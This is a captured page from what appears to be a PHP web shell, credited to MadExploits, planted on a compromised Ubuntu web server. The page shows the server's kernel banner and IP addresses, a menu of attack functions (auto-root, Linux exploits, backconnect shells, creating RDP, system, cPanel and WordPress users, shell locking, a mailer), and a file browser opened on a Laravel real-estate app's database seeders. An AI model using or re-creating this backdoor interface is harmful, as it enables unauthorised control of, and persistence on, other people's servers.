Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.75
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
database /
seeders /
[ HOME SHELL ]
Name
Size
Permission
Action
AreaSeeder.php
1.09
KB
-rwxr-xr-x
AssignRolesSeeder.php
272
B
-rwxr-xr-x
CountriesTableSeeder.php
21.66
KB
-rwxr-xr-x
DatabaseSeeder.php
405
B
-rwxr-xr-x
PostalCodeSeeder.php
741
B
-rwxr-xr-x
RolePermissionSeeder.php
729
B
-rwxr-xr-x
SourceSeeder.php
656
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PostalCodeSeeder.php
<?php namespace Database\Seeders; use Illuminate\Database\Seeder; use App\Models\PostalCode; class PostalCodeSeeder extends Seeder { public function run(): void { $data = [ ['city' => 'Lahore', 'postal_code' => '54000'], ['city' => 'Karachi', 'postal_code' => '74000'], ['city' => 'Islamabad', 'postal_code' => '44000'], ['city' => 'Rawalpindi', 'postal_code' => '46000'], ['city' => 'Peshawar', 'postal_code' => '25000'], ['city' => 'Faisalabad', 'postal_code' => '38000'], ['city' => 'Multan', 'postal_code' => '60000'], ['city' => 'Quetta', 'postal_code' => '87300'], ]; PostalCode::insert($data); } }
Close